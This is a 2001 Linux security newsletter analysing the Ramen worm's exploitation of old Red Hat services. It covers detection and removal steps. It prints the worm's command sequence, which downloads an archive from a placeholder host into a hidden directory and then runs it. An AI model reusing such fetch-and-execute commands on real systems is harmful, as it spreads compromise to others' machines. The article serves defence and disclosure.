LINUX SECURITY --- February 13, 2001
Published by ITworld.com -- changing the way you view IT
http://www.itworld.com/newsletters
__________________________________________________________________________
______
HIGHLIGHTS
* Dissecting the Ramen Worm.
__________________________________________________________________________
______
The Infamous Ramen Worm
By Rick Johnson
The Linux world has been buzzing recently about the Ramen Worm -- a
self-propagating worm that affects vulnerable versions of Red Hat 6 and
7. It attacks systems running vulnerable versions of wu-ftp,
rpc.statd, and LPRng. Fixes have been available for months for all of
these vulnerabilities though.
In addition to scanning for additional systems and propagating to
vulnerable ones, the worm also defaces Web servers it encounters by
replacing the "index.html" file with the following: "RameN Crew -
Hackers looooooooooooove noodles" and an image of a Top Ramen-brand
oriental noodle package.
An Daniel Martin's (dtmartin24@home.com) full analysis of the worm is
available at http://members.home.net/dtmartin24/ramen_worm.txt. A
condensed version of his findings follows.
The worm begins with a modified form of synscan. This modified synscan
checks against the FTP banner for the strings "Mon Feb 28" and "Wed Aug
9". If it finds the first string, then it writes the hostname and/or
ip of the scanner to the file ".w"; if it finds the second, then it
writes to the file ".l" (both in the current directory). Presumably,
this separation differentiates two breeds of exploitable machines --
Red Hat 6.2 and Red Hat 7.0.
Against ".w" file machines (i.e., Red Hat 6.2 machines), the attack
first runs a wu-ftpd exploit. Next, a copy of the widely available
statdx exploit for Red Hat 6.2 nfsd's runs against the target machine.
If either attack succeeds, the worm executes the following sequence of
commands:
mkdir /usr/src/.poop;cd /usr/src/.poop
export TERM=vt100
lynx -source http://FROMADDR:27374 > /usr/src/.poop/ramen.tgz
cp ramen.tgz /tmp
gzip -d ramen.tgz;tar -xvf ramen.tar;./start.sh
echo Eat Your Ramen! | mail -s TOADDR -c gb31337@hotmail.com
gb31337@yahoo.com
Against Red Hat 7 machines (the ".l" file), the attack appears aimed at
the LPRng syslog format bug. A successful attack follows with the same
shell commands executed against 6.2 machines. After executing the shell
commands, Ramen uses inetd on Red Hat 6.2 and xinetd on Red Hat 7.0 to
establish a minimal HTTP/0.9 server on port 27374 and begins serving
copies of it. It determines its IP address, and removes the vulnerable
services it uses to spread itself - rpc.statd on Red Hat 6.2 and lpd on
Red Hat 7.0. In addition, the users "ftp" and "anonymous" are added
to /etc/ftpusers to close the wu-ftpd hole.
Luckily, Ramen does not try hiding itself. It can be detected on a
system by the presence of the /usr/src/.poop directory or the /sbin/asp
file. ISS (http://www.iss.net) recommends the following steps for
removal:
To remove the Ramen Worm from your system, follow these steps:
1. Delete: /usr/src/.poop and /sbin/asp.
2. If it exists, remove: /etc/xinetd.d/asp
3. Remove all lines in /etc/rc.d/rc.sysinit which refer to any
file in /etc/src/.poop.
4. Remove any lines in /etc/inetd.conf referring to /sbin/asp
5. Reboot the system or manually kill any processes such as
synscan, start.sh, scan.sh, hackl.sh, or hackw.sh.
6. ISS recommends that ftp, rpc.statd, or lpr are not enabled
until updates have been installed.
William Stearns (wstearns@pobox.com) has also written a script to
detect the Ramen worm. It can be downloaded from:
http://www.sans.org/y2k/ramen.htm. Check it out.
About the author(s)
----------------
Rick Johnson is currently the Manager of Security Services for
FusionStorm, a remote managed services company. When not writing, he
heads the development team for PMFirewall, an Ipchains Firewall and
Masquerading Configuration Utility for Linux. Rick can be contacted via
email at rick@pointman.org or on the web at http://www.pointman.org.
__________________________________________________________________________
______
ADDITIONAL RESOURCES
Anna Kournikova virus hits US
Tennis star image touted in dangerous document
http://www.itworld.com/jump/linsec_nl/www.itworld.com/Net/3271/Itwnws02021
2anna_bug/
Stopping the Ramen worm
Linux and Unix administrators need to be more vigilant in their
security measures
http://www.linuxworld.com/jlw/linsec_nl/lw-2001-02/lw-02-ramenworm.html
Ramen Linux worm seen in wild
http://www.itworld.com/jump/linsec_nl/www.itworld.com/Comp/2366/ITW_1-25-0
1_Ramen
__________________________________________________________________________
______
<<attachment: winmail.dat>>